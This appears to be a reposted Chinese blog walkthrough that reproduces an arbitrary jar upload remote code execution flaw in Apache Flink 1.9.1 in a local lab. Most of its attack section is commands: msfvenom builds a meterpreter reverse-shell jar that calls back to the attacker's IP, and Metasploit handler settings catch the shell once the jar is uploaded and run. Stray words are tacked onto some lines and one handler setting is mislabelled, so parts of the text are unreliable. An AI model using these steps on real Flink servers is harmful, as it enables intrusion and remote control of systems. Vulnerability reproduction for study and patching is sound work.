Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
0x00簡介
Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇而且已經應用與實際的業務場景中。不少公司在進行選型的時候都會選擇Apache Flink做爲選型的對象。
Apache Flink能用來作什麼?
實時推薦系統
實時報表
實時數倉與ETL
復瑣事件處理
實時欺詐與實時信用評估
大數據安全監測
Flink核心是一個流式的數據流執行引擎,其針對數據流的分佈式計算提供了數據分佈、數據通訊以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分佈式任務。java
0x01漏洞介紹
***者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的shell
0x02影響範圍
至目前Apache Flink 1.9.1版本apache
0x03環境搭建
***機kali:192.168.10.147
受害機Ubuntu:192.168.10.176
測試環境:Flink 1.9.1 java8+
Apache Flink 1.9.1安裝包下載:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下載完成後使用解壓
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
進入bin目錄運行./start-cluster.sh啓動環境
環境搭建成功 目標站點 http://192.168.10.176:8081
0x04漏洞復現
1.使用kali生成jar後門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
2.***機訪問目標站點 並上傳shell.jar
3.使用kali配置監聽
use exploit/multi/handler
set payload java/shell/reverse_tcp
set RHOST 192.168.10.147
set LPORT 2020
run
4.點開剛剛上傳的shell.jar,觸發漏洞
0x05修復方式
更新官網補丁或更新最新版本安全
- 1. Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
- 2. Apache Flink任意Jar包上傳漏洞復現過程
- 3. Apache Flink任意Jar包上傳導致遠程代碼執行漏洞復現
- 4. 「漏洞預警」Apache Flink 任意 Jar 包上傳致使遠程代碼執行漏洞復現
- 5. 「漏洞預警」Apache Flink 任意 Jar 包上傳導致遠程代碼執行漏洞復現
- 6. [漏洞復現] Apache Solr RCE
- 7. Apache Solr JMX服務 RCE 漏洞復現
- 8. 任意下載漏洞、任意文件上傳漏洞和任意文件包含漏洞的學習記錄
- 9. zimbra rce 漏洞復現
- 10. Redis-RCE漏洞復現
- 更多相關文章...
- • PHP 文件上傳 - PHP教程
- • Eclipse 生成jar包 - Eclipse 教程
- • Flink 數據傳輸及反壓詳解
- • ☆基於Java Instrument的Agent實現
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
- 2. Apache Flink任意Jar包上傳漏洞復現過程
- 3. Apache Flink任意Jar包上傳導致遠程代碼執行漏洞復現
- 4. 「漏洞預警」Apache Flink 任意 Jar 包上傳致使遠程代碼執行漏洞復現
- 5. 「漏洞預警」Apache Flink 任意 Jar 包上傳導致遠程代碼執行漏洞復現
- 6. [漏洞復現] Apache Solr RCE
- 7. Apache Solr JMX服務 RCE 漏洞復現
- 8. 任意下載漏洞、任意文件上傳漏洞和任意文件包含漏洞的學習記錄
- 9. zimbra rce 漏洞復現
- 10. Redis-RCE漏洞復現